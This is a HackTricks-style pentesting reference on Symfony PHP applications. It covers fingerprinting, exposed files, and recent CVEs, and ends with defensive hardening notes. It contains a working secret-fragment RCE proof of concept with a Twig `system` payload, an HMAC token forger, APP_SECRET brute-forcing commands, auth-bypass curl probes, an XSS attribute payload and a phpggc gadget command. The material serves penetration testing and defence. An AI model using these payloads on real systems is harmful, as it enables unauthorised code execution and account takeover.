symphony.md (10657B)
1 --- 2 title: "Symfony" 3 section: "Network Services" 4 sectionSlug: "network-services-pentesting" 5 sourcePath: "src/network-services-pentesting/pentesting-web/symphony.md" 6 sourceUrl: "https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/network-services-pentesting/pentesting-web/symphony.md" 7 sha: "188de82beb54e70956b2952367a0af91d26758b8" 8 isIndex: false 9 modified: true 10 license: "CC-BY-NC-4.0" 11 --- 12 13 # Symfony 14 15 Symfony is one of the most widely-used PHP frameworks and regularly appears in assessments of enterprise, e-commerce and CMS targets (Drupal, Shopware, Ibexa, OroCRM … all embed Symfony components). This page collects offensive tips, common mis-configurations and recent vulnerabilities you should have on your checklist when you discover a Symfony application. 16 17 > Historical note: A large part of the ecosystem still runs the **5.4 LTS** branch (EOL **November 2025**). Symfony **7.4** became the new LTS in **Nov 2025** and will receive security fixes until **Nov 2029**. Always verify the exact patch-level because many 2024‑2026 advisories were fixed only in micro releases. 18 19 --- 20 21 ## Recon & Enumeration 22 23 ### Finger-printing 24 * HTTP response headers: `X-Powered-By: Symfony`, `X-Debug-Token`, `X-Debug-Token-Link` or cookies starting with `sf_redirect`, `sf_session`, `MOCKSESSID`. 25 * Source code leaks (`composer.json`, `composer.lock`, `/vendor/…`) often reveal the exact version: 26 ```bash 27 curl -s https://target/vendor/composer/installed.json | jq '.[] | select(.name|test("symfony/")) | .name,.version' 28 ``` 29 * Public routes that only exist on Symfony: 30 * `/_profiler` (Symfony **Profiler** & debug toolbar) 31 * `/_wdt/<token>` (“Web Debug Toolbar”) 32 * `/_error/{code}.{_format}` (pretty error pages) 33 * `/app_dev.php`, `/config.php`, `/config_dev.php` (pre-4.0 dev front-controllers) 34 * Wappalyzer, BuiltWith or ffuf/feroxbuster wordlists: `symfony.txt` → look for `/_fragment`, `/_profiler`, `.env`, `.htaccess`. 35 36 ### Interesting files & endpoints 37 | Path | Why it matters | 38 |------|----------------| 39 | `/.env`, `/.env.local`, `/.env.prod` | Frequently mis-deployed → leaks `APP_SECRET`, DB creds, SMTP, AWS keys | 40 | `/.git`, `.svn`, `.hg` | Source disclosure → credentials + business logic | 41 | `/var/log/*.log`, `/log/dev.log` | Web-root mis-configuration exposes stack-traces | 42 | `/_profiler` | Full request history, configuration, service container, **APP_SECRET** (≤ 3.4) | 43 | `/_fragment` | Entry point used by ESI/HInclude. Abuse possible once you know `APP_SECRET` | 44 | `/vendor/phpunit/phpunit/phpunit` | PHPUnit RCE if accessible (CVE-2017-9841) | 45 | `/index.php/_error/{code}` | Finger-print & sometimes leak exception traces | 46 47 --- 48 49 ## High-impact Vulnerabilities 50 51 ### 1. APP_SECRET disclosure ➜ RCE via `/_fragment` (aka “secret-fragment”) 52 * **CVE-2019-18889** originally, but *still* appears on modern targets when debug is left enabled or `.env` is exposed. 53 * Once you know the 32-char `APP_SECRET`, craft an HMAC token and abuse the internal `render()` controller to execute arbitrary Twig: 54 ```python 55 # PoC – requires the secret 56 import hmac, hashlib, requests, urllib.parse as u 57 secret = bytes.fromhex('deadbeef…') 58 payload = "{{['id']|filter('system')}}" # RCE in Twig 59 query = { 60 'template': '@app/404.html.twig', 61 'filter': 'raw', 62 '_format': 'html', 63 '_locale': 'en', 64 'globals[cmd]': 'id' 65 } 66 qs = u.urlencode(query, doseq=True) 67 token = hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest() 68 r = requests.get(f"https://target/_fragment?{qs}&_token={token}") 69 print(r.text) 70 ``` 71 * Excellent write-up & exploitation script: Ambionics blog (linked in References).<sup>[[1]](#references)</sup> 72 73 ### 2. PATH_INFO auth bypass – **CVE-2025-64500** (HttpFoundation) 74 * Affects versions below 5.4.50, 6.4.29 and 7.3.7. Path normalization could drop the leading `/`, breaking access-control rules that assume `/admin` etc. 75 * Quick test: `curl -H 'PATH_INFO: admin/secret' https://target/index.php` → if it reaches admin routes without auth, you found it. 76 * Patch by upgrading `symfony/http-foundation` or the full framework to the fixed patch level.<sup>[[5]](#references)</sup> 77 78 ### 3. MSYS2/Git-Bash argument mangling – **CVE-2026-24739** (Process) 79 * Affects versions below 5.4.51, 6.4.33, 7.3.11, 7.4.5 and 8.0.5 on Windows when PHP is run from MSYS2 (Git-Bash, mingw). `Process` fails to quote `=` leading to corrupted paths; destructive commands (`rmdir`, `del`) may target unintended dirs.<sup>[[4]](#references)</sup> 80 * If you can upload a PHP script or influence Composer/CLI helpers that call `Process`, craft arguments with `=` (e.g. `E:/=tmp/delete`) to cause path re-write. 81 82 ### 4. Runtime env/argv injection – **CVE-2024-50340** (Runtime) 83 * When `register_argv_argc=On` and using non-SAPI runtimes, crafted query strings could flip `APP_ENV`/`APP_DEBUG` via `argv` parsing. Patched in 5.4.46/6.4.14/7.1.7.<sup>[[6]](#references)</sup> 84 * Look for `/?--env=prod` or similar being accepted in logs. 85 86 ### 5. URL validation / open redirect – **CVE-2024-50345** (HttpFoundation) 87 * Special characters in the URI were not validated the same way browsers do, enabling redirect to attacker-controlled domains. Fixed in 5.4.46/6.4.14/7.1.7.<sup>[[7]](#references)</sup> 88 89 ### 6. Symfony UX attribute injection – **CVE-2025-47946** 90 * `symfony/ux-twig-component` & `symfony/ux-live-component` before **2.25.1** render `{{ attributes }}` without escaping → attribute injection/XSS. If the app lets users define component attributes (admin CMS, email templating) you can chain to script injection.<sup>[[3]](#references)</sup> 91 * Update both packages to 2.25.1+. As a manual exploit, place JS in an attribute value passed to a custom component and trigger rendering. 92 93 ### 7. Windows Process Hijack – **CVE-2024-51736** (Process) 94 * The `Process` component searched the current working directory **before** `PATH` on Windows. An attacker able to upload `tar.exe`, `cmd.exe`, etc. in a writable web-root and trigger `Process` (e.g. file extraction, PDF generation) gains command execution.<sup>[[2]](#references)</sup> 95 * Patched in 5.4.50, 6.4.14, 7.1.7. 96 97 ### 8. Session-Fixation – **CVE-2023-46733** 98 * Authentication guard reused an existing session ID after login. If an attacker sets the cookie **before** the victim authenticates, they hijack the account post-login. 99 100 ### 9. Twig sandbox XSS – **CVE-2023-46734** 101 * In applications that expose user-controlled templates (admin CMS, email builder) the `nl2br` filter could be abused to bypass the sandbox and inject JS. 102 103 ### 10. Symfony 1 gadget chains (still found in legacy apps) 104 * `phpggc symfony/1 system id` produces a Phar payload that triggers RCE when an unserialize() happens on classes such as `sfNamespacedParameterHolder`. Check file-upload endpoints and `phar://` wrappers. 105 106 107 [Php Deserialization + Autoload Classes](/hacktricks/pentesting-web/deserialization/php-deserialization-autoload-classes) 108 109 --- 110 111 ## Exploitation Cheat-Sheet 112 113 ### Calculate HMAC token for `/_fragment` 114 ```bash 115 python - <<'PY' 116 import sys, hmac, hashlib, urllib.parse as u 117 secret = bytes.fromhex(sys.argv[1]) 118 qs = u.quote_plus(sys.argv[2], safe='=&') 119 print(hmac.new(secret, qs.encode(), hashlib.sha256).hexdigest()) 120 PY deadbeef… "template=@App/evil&filter=raw&_format=html" 121 ``` 122 123 ### Bruteforce weak `APP_SECRET` 124 ```bash 125 cewl -d3 https://target -w words.txt 126 symfony-secret-bruteforce.py -w words.txt -c abcdef1234567890 https://target 127 ``` 128 129 ### RCE via exposed Symfony Console 130 If `bin/console` is reachable through `php-fpm` or direct CLI upload: 131 ```bash 132 php bin/console about # confirm it works 133 php bin/console cache:clear --no-warmup 134 ``` 135 Use deserialization gadgets inside the cache directory or write a malicious Twig template that will be executed on the next request. 136 137 ### Probe PATH_INFO bypass quickly (CVE-2025-64500) 138 ```bash 139 curl -i -H 'PATH_INFO: admin/secret' https://target/index.php 140 # If it returns protected content without redirect/auth, the Request normalization is vulnerable. 141 ``` 142 143 ### Spray UX attribute injection (CVE-2025-47946) 144 ```text 145 {# attacker-controlled attribute value #} 146 <live:button {{ attributes|merge({'onclick':'alert(1)'}) }} /> 147 ``` 148 If the rendered output echoes the attribute unescaped, XSS succeeds. Patch to 2.25.1+. 149 150 --- 151 152 ## Defensive notes 153 1. **Never deploy debug** (`APP_ENV=dev`, `APP_DEBUG=1`) to production; block `/app_dev.php`, `/_profiler`, `/_wdt` in the web-server config. 154 2. Store secrets in env vars or `vault/secrets.local.php`, *never* in files accessible through the document-root. 155 3. Enforce patch management – subscribe to Symfony security advisories and keep at least the LTS patch-level (5.4.x until Nov 2025, 6.4 until Nov 2027, 7.4 until Nov 2029). 156 4. If you run on Windows, upgrade immediately to mitigate CVE-2024-51736 & CVE-2026-24739 or add a `open_basedir`/`disable_functions` defence-in-depth. 157 158 --- 159 160 ### Useful offensive tooling 161 * **ambionics/symfony-exploits** – secret-fragment RCE, debugger routes discovery. 162 * **phpggc** – Ready-made gadget chains for Symfony 1 & 2. 163 * **sf-encoder** – small helper to compute `_fragment` HMAC (Go implementation). 164 165 166 ## References 167 168 - [1] [Ambionics – Symfony “secret-fragment” Remote Code Execution](https://www.ambionics.io/blog/symfony-secret-fragment) 169 - [2] [Symfony Security Advisory – CVE-2024-51736: Command Execution Hijack on Windows Process Component](https://symfony.com/blog/cve-2024-51736-command-execution-hijack-on-windows-with-process-class) 170 - [3] [Symfony Blog – CVE-2025-47946: Unsanitized HTML attribute injection in UX components](https://symfony.com/blog/symfony-ux-cve-2025-47946-unsanitized-html-attribute-injection-via-componentattributes) 171 - [4] [Symfony Blog – CVE-2026-24739: Incorrect argument escaping under MSYS2/Git Bash](https://symfony.com/blog/cve-2026-24739-incorrect-argument-escaping-under-msys2-git-bash-on-windows-can-lead-to-destructive-file-operations) 172 - [5] [Symfony Blog – CVE-2025-64500: Incorrect parsing of PATH_INFO can lead to limited authorization bypass](https://symfony.com/blog/cve-2025-64500-incorrect-parsing-of-path-info-can-lead-to-limited-authorization-bypass) 173 - [6] [GitHub Security Advisory – CVE-2024-50340: symfony/runtime allows APP_ENV/APP_DEBUG override via crafted argv parsing](https://github.com/symfony/symfony/security/advisories/GHSA-x8vp-gf4q-mw5j) 174 - [7] [GitHub Security Advisory – CVE-2024-50345: symfony/http-foundation improper URI validation enables open redirect](https://github.com/symfony/symfony/security/advisories/GHSA-mrqx-rp3w-jpjp)